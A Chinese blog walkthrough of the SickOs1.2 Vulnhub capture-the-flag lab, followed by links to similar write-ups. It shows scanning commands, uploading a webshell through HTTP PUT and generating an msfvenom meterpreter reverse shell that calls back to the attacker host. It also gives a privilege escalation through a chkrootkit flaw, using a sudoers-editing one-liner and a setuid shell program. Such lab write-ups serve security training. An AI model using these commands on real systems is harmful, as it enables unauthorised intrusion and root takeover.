靶机渗透实战——SickOs1.2

最新推荐文章于 2024-03-21 22:23:42 发布
最新推荐文章于 2024-03-21 22:23:42 发布
阅读量873 收藏 3
点赞数
文章标签: 实战靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlw876747595/article/details/103573806
版权

一、实验环境

靶机:SickOs1.2,IP地址暂时未知

测试机:Kali(IP:192.168.232.130)

测试机:物理机win7

二、实验流程

信息收集——主机发现

信息收集——端口扫描

渗透测试

三、实验步骤

(一)信息收集——主机发现

1、查看kaliIP信息

2、查看靶机页面

3、扫描主机(netdiscover)

netdiscover -i eth0 -r 192.168.232.0/24

netdiscover: -i 指定网卡 -r 指定网段

(二)信息收集——端口扫描

1、扫描端口(masscan)

masscan --rate=10000 --ports 0-65535 192.168.232.136

目标主机开放80、22端口

2、详细扫描端口信息(nmap)

nmap -T4 -sV -O -p 22,80 192.168.232.136

22:ssh

80:http

(三)渗透测试

80端口(http服务)

1、访问目标靶机的80端口

192.168.232.136:80

未发现可利用信息

2、网站目录扫描(dirb)

dirb http://192.168.232.136

3、查看扫到的网站目录

3.1> http://192.168.232.136/index.php

3.2> http://192.168.232.136/test/

可以看到该目录下有许多可以查看的php文件,不知道是否可以把文件上传到该目录,但在该页面并没有发现文件的上传点

注:如果该页面支持http的put方法,就可以间接性的上传文件

4. 查看/test/目录支持的方法

对/test/目录OPTIONS一下,查看它支持什么方法,如果支持PUT方法,我们就可以上传文件

也可以用curl -v -X OPTIONS http://192.168.232.136/test/

支持PUT方法可以上传

5. 上传一句话木马,获取webshell

5.1> 上传一句话木马

上传成功

注:如果上传的文件存在,则返回的状态码是200,否则是201;

5.2> 使用中国蚁剑进行连接

 

成功获取webshell

6. 上传文件,获取反弹shell

6.1> 上传文件1.php

将Kali上的php-reverse-shell.php复制到物理机上,重命名为1.php,并修改监听的IP地址和端口;

IP:192.168.232.130

Port:443(注:换成其他高位端口不能监听成功,防火墙过滤掉了)

 

6.2> 上传成功

6.3> 在Kali上监听443端口;再点击上传成功的1.php文件,成功获取到shell

7. 方式2获取shell:Msfvenom生成payload

7.1> 上传一个精心构造的php webshell,使用msfvenom生成payload

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.232.130 LPORT=443 > shell_443.php

7.2> 将shell666上传到靶机的test目录下;

curl -v -H "Expect:" -T shell_443.php "http://192.168.232.136/test/"

在curl的参数中加上一个特定的HTTP Header Expect:,即将Header中Expect的值手动指定为空。

7.3> 在Kali测试机上打开msfconsole,exploit/multi/handler模块,指定IP和端口进行监听,然后放到后台。 

7.4> 使用curl访问上传到靶机上的shell666.php文件后

7.5> 即可触发服务器端反弹TCP的操作, 在msfconsole里就会得到一个meterpreter的shell

7.6> 在meterpreter中用shell命令来得到一个交互式的shell,但是并没有tty,需要用python生成一个bash。 

python -c 'import pty;pty.spawn("/bin/bash")'

获取了普通用户的权限,接下来就是提权

8、提权

8.1> 查看靶机服务器和版本信息

8.2> 扫描版本的漏洞

可以看到chkrootkit存在本地提权漏洞

8.3> 方法一:添加当前用户www-data到sudoers列表中

新建一个文件update

给update文件添加执行权限;

添加当前用户www-data到sudoers列表中;

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update

8.4> 方法二:创建shell.c文件

在Kali上编写shell.c文件

#include<unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

将shell.c文件上传到靶机上

curl -v -H "Expect:" -T shell.c http://192.168.232.136/test/

四、实验总结

如果某个网站目录下有很多文件可以访问,那是否能上传文件到这里呢,可以猜想是否具有文件上传漏洞;

如果某页面支持http的put方法,就可以间接性的上传文件;

如果高位端口不能监听到信息,可以尝试监听443端口,因为防火墙可能会过滤掉非常用端口的流量;

 

Poilkjz
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透测试实战(十)——SickOs1.2渗透实战
橘子女侠
05-11 4288
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访...
靶机渗透(九)SickOs1.2
qq_42180996的博客
05-07 2193
靶机SickOs1.2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.远程登录(22端口) 3.目录扫描(dirb) (三)获取shell 1.方法一:P...
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7109
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 靶机基本介绍: 这是SickOs后续系列的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
SickOs1.2 靶机渗透
weixin_44769042的博客
11-09 3813
靶机记录--9 目录 1.主机发现 2.端口扫描 3.版本信息,操作系统扫描 4.漏洞查找及利用 1> 访问网站 2> 22端口尝试ssh登陆 3> 目录扫描 4>查看该目录支持的方法 1>> nmap探测 2>> burp抓包探测 5> 写入一句话木马 6> 蚁剑连接 7> getshell 1>>将kali自带的反弹shell脚本复制出来 2>> 搞到蚁剑里来 3&gt...
vulnhub靶场渗透之SickOs1.2渗透教程(超级详细)
旺仔Sec&blog
05-30 1928
靶机下载链接作者D4rk发布日期2016年4月27日难度等这是SickOs后续系列的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
靶机实战-SickOs1.2
滕财然的博客
01-27 370
SickOs1.2靶机实战 文章目录SickOs1.2靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务Getshell方式一Getshell方式二5、提权方式一方式二方法三//这一个方法我没成功,你们可以尝试一下 1、主机发现 arp扫描 目标IP:192.168.232.161 2、端口扫描 目标开放80、22端口 3、端口详细信息扫描 4、访问80端口...
Vulnhub靶机SickOs1.2
qq_48904485的博客
03-21 745
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
【学渗透靶机——sickOS1.1】
jieli0901227的博客
04-12 90
从服务器信息收集看 这台靶机的ip为192.168.241.150 ,服务器开放了22,3128、8080使用nmap扫描漏洞也么什么发现,。对于开放的端口我们优先8080和3128。
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1615
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
java毕业作品-JAVA技术在《堡垒》手机游戏开发的应用与探索(源代码+论文)
最新发布
08-03
java毕业作品_JAVA技术在《堡垒》手机游戏开发的应用与探索(源代码+论文)
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入 刷之前备份原bios避免翻车
08-03
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入。刷之前备份原bios避免翻车
第5章 传输层 计算机网络思维导图,结合学习通作业
08-03
计算机网络思维导图,结合学习通作业,方便备考复习。
Navicat 的主要功能、使用方法和常见问题.md
08-03
Navicat 的主要功能、使用方法和常见问题.md
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值